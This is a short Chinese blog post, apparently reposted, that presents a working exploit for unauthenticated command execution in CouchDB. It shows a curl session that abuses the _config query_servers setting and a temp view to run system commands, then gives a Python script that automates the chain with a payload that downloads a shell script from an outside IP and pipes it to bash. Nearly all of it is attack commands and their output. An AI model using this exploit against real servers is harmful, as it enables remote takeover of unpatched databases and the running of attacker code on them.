CouchDB未授权访问漏洞执行任意系统命令exp
Posted persuit
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了CouchDB未授权访问漏洞执行任意系统命令exp相关的知识,希望对你有一定的参考价值。
[email protected]:~# curl -X PUT ‘http://3d9da15e7acfd5730.jie.sangebaimao.com/_config/query_servers/cmd‘ -d ‘"/sbin/ifconfig>/tmp/6666"‘
""
[email protected]:~# curl -X PUT ‘http://3d9da15e7acfd5730.jie.sangebaimao.com/vultest‘
{"ok":true}
[email protected]:~# curl -X PUT ‘http://3d9da15e7acfd5730.jie.sangebaimao.com/vultest/vul‘ -d ‘{"_id":"770895a97726d5ca6d70a22173005c7b"}‘
{"ok":true,"id":"vul","rev":"1-967a00dff5e02add41819138abb3284d"}
[email protected]:~# curl -X POST ‘http://3d9da15e7acfd5730.jie.sangebaimao.com/vultest/_temp_view?limit=11‘ -d ‘{"language":"cmd","map":""}‘ -H ‘Content-Type: application/json‘
{"error":"EXIT","reason":"{{badmatch,{error,{bad_return_value,{os_process_error,{exit_status,0}}}}},\n [{couch_query_servers,new_process,3,\n [{file,\"couch_query_servers.erl\"},{line,477}]},\n {couch_query_servers,lang_proc,3,\n [{file,\"couch_query_servers.erl\"},{line,462}]},\n {couch_query_servers,handle_call,3,\n [{file,\"couch_query_servers.erl\"},{line,334}]},\n {gen_server,handle_msg,5,[{file,\"gen_server.erl\"},{line,585}]},\n {proc_lib,init_p_do_apply,3,[{file,\"proc_lib.erl\"},{line,239}]}]}"}
[email protected]:~#
PY:
def CouchDb(url): print url cmd = ‘curl -X PUT \‘‘ +url +‘/_config/query_servers/cmd\‘‘+ ‘ -d ‘ + ‘\‘"/usr/bin/curl http://192.184.40.86:6554/1.sh|bash>/tmp/6666"\‘‘ cmd1 = ‘curl -X PUT \‘‘ +url +‘/vultest\‘‘ cmd2 = ‘curl -X PUT \‘‘ +url +‘/vultest/vul\‘‘ +‘ -d ‘ + ‘\‘{"_id":"770895a97726d5ca6d70a22173005c7b"}\‘‘ cmd3 = ‘curl -X POST \‘‘ +url +‘/vultest/_temp_view?limit=11\‘‘ + ‘ -d ‘+ ‘\‘{"language":"cmd","map":""}\‘‘+ ‘ -H ‘ ‘\‘Content-Type: application/json\‘‘ #print cmd3 step1 = os.system(cmd) step2 = os.system(cmd1) step3 = os.system(cmd2) setp4 = os.system(cmd3) pass
参考:
http://drops.wooyun.org/papers/16030
以上是关于CouchDB未授权访问漏洞执行任意系统命令exp的主要内容,如果未能解决你的问题,请参考以下文章
漏洞分析|SaltStack未授权访问及命令执行漏洞分析(CVE-2020-16846/25592)